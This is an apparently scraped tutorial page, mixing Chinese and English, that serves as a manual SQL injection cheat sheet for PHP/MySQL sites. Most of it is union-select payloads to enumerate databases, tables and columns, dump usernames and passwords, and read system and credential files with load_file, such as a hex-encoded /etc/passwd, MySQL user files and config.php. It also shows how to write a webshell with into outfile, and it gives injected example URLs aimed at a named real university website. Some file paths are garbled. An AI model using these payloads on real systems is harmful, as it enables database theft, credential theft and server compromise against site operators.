PHP+MySQL Manual Injection Statement Recommendation_PHP Tutorial

暴字段长度

Order by num/*

匹配字段

and 1=1 union select 1,2,3,4,5…….n/*

暴字段位置

and 1=2 union select 1,2,3,4,5…..n/*

利用内置函数暴数据库信息

version() database() user()  

不用猜解可用字段暴数据库信息(有些网站不适用):

and 1=2 union all select version() /*

and 1=2 union all select database() /*

and 1=2 union all select user() /*

操作系统信息：

and 1=2 union all select @@global.version_compile_os from mysql.user /*

数据库权限：

and ord(mid(user(),1,1))=114 /* 返回正常说明为root

暴库 (mysql>5.0)

Mysql 5 以上有内置库 information_schema，存储着mysql的所有数据库和表结构信息

and 1=2 union select 1,2,3,SCHEMA_NAME,5,6,7,8,9,10 from information_schema.SCHEMATA limit 0,1

猜表

and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=数据库（十六进制） limit 0（开始的记录，0为第一个开始记录）,1（显示1条记录）—

猜字段

and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名（十六进制）limit 0,1

暴密码

and 1=2 Union select 1,2,3,用户名段,5,6,7,密码段,8,9 from 表名 limit 0,1

高级用法（一个可用字段显示两个数据内容）：

Union select 1,2,3concat(用户名段,0x3c,密码段),5,6,7,8,9 from 表名 limit 0,1

直接写马(Root权限)

条件：1、知道站点物理路径

       2、有足够大的权限（可以用select …. from mysql.user测试）

       3、magic_quotes_gpc()=OFF

select   ‘'   into outfile ‘物理路径'

and 1=2 union all select 一句话HEX值 into outfile '路径'

load_file() 常用路径：

1. replace(load_file(0×2F6574632F706173737764),0×3c,0×20)
2. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60 ) ,char(32))
The above two are to view the complete display code in a PHP file. Sometimes some characters are not replaced, such as "<" replaced with "space", and the web page is returned. The code cannot be viewed.
3. load_file(char(47)) can list the root directory of FreeBSD and Sunos systems
4. /etc tpd/conf tpd.conf or /usr/local/apche/conf tpd.conf to view the linux APACHE virtual Host configuration file
5. c:Program FilesApache GroupApacheconf httpd.conf or C:apacheconf httpd.conf View WINDOWS system apache file
6. c:/Resin-3.0.14/conf/resin.conf View jsp development Website resin file configuration information.
7. c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf View the JSP virtual host configured in the linux system
8. d:APACHEApache2confhttpd .conf
　9. C:Program Filesmysqlmy.ini
　10.../themes/darkblue_orange/layout.inc.php phpmyadmin explosion path
　11. c:windowssystem32inetsrvMetaBase.xml View the IIS virtual host configuration file
12. /usr/local/resin-3.0.22/conf/resin.conf View the RESIN configuration file for 3.0.22
13. /usr/local/resin-pro-3.0.22/conf/ resin.conf Same as above
14. /usr/local/app/apache2/conf/extra tpd-vhosts.conf APASHE virtual host view
15. /etc/sysconfig/iptables This firewall policy
16. usr/local/app/php5 b/php.ini PHP equivalent settings
17. /etc/my.cnf MYSQL configuration file
18. /etc/redhat-release Red Hat system version
19 , C:mysqldatamysqluser.MYD The user password that exists in the MYSQL system
　20. /etc/sysconfig/network-scripts/ifcfg-eth0 Check the IP.
　21. /usr/local/app/php5 b/php. ini //PHP related settings
　22./usr/local/app/apache2/conf/extra tpd-vhosts.conf //Virtual website settings
　23.C:Program FilesRhinoSoft.comServ-USerUDaemon. ini
24. c:windowsmy.ini
25. c:boot.ini

Common website configuration files config.inc.php, config.php. Use replace(load_file(HEX), char(60), char(32)) when loading_file()

Note:

Char(60) means <

Char (32) means space

Problems that occur during manual injection:

After injection the page displays:

Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'

For example: http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file (0x433A5C626F6F742E696E69),3,4,user()%20

This is caused by inconsistent encoding before and after,

Solution: Just add unhex(hex(parameter)) before the parameter. The above URL can be changed to:

http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex(hex (load_file(0x433A5C626F6F742E696E69))),3,4,unhex(hex(user()))%20

You can continue the injection. . .

http://www.bkjia.com/PHPjc/320712.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/320712.htmlTechArticleExtreme field length Order by num/* matching field and 1=1 union select 1,2,3,4, 5…….n/* Expose field position and 1=2 union select 1,2,3,4,5…..n/* Use built-in function to extract database information ver...